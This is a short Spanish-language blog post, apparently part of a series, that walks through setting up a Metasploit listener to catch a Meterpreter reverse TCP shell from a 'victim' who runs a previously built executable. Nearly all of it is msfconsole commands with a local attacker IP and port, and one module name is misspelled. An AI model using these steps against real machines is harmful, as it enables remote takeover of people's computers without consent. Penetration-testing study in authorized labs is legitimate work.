dilluns, 18 de maig del 2015

Estableciendo el control de la victima

Ya tengamos el ejecutable, ahora lo vamos a dejar escuchando para que en cuanto la víctima ejecute el payload, se cree la conexión. Para ello entramos en msfconsole y ejecutamos lo sigiente:

# msfconsole

> use exploit/multi/handles

> set payload windows/meterpreter/reverse_tcp

> set lhost 192.168.1.99

> set lport 4444

> exploit

Y lo dejamos esperando a la respuesta del servidor.

Cap comentari:

Publica un comentari a l'entrada